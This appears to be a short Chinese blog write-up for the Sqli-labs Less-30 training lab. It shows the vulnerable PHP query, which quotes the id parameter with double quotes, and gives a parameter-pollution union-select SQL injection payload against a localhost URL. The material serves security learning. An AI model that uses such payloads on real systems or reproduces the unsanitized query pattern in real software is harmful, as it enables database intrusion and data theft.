Sqli-labs Less-30 HPP参数污染攻击

Less-30与less-29原理是一致的,区别仅仅是将id的‘变为了",我们可以看到less-30的sql语句为:

$id=$_GET[‘id‘];
$id = ‘"‘ .$id. ‘"‘;
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

所以payload为:

http://127.0.0.1/sql/Less-30/login.php?id=1&id=-1" union select 1,database(),3--+

Sqli-labs Less-30 HPP参数污染攻击

 

Sqli-labs Less-30 HPP参数污染攻击

上一篇:php Smarty date_format [格式化时间日期]


下一篇:Sqli-labs Less-6 使用updatexml()函数进行报错注入